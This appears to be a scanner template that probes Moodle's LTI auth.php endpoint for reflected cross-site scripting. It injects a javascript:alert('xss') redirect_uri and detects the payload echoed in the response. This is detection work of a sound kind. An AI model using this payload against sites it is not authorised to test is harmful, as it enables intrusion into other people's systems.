id: moodle-auth-xss
info:
  name: Moodle Auth XSS
  risk: Medium

params:
  - root: "{{.BaseURL}}"

replicate:
  prefixes: 'moodle,course'

requests:
  - method: GET
    redirect: false
    url: >-
      {{.root}}/mod/lti/auth.php?redirect_uri=javascript:alert('xss')
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "document.ltiAuthForm") && StringSearch("response", "javascript:alert('xss')")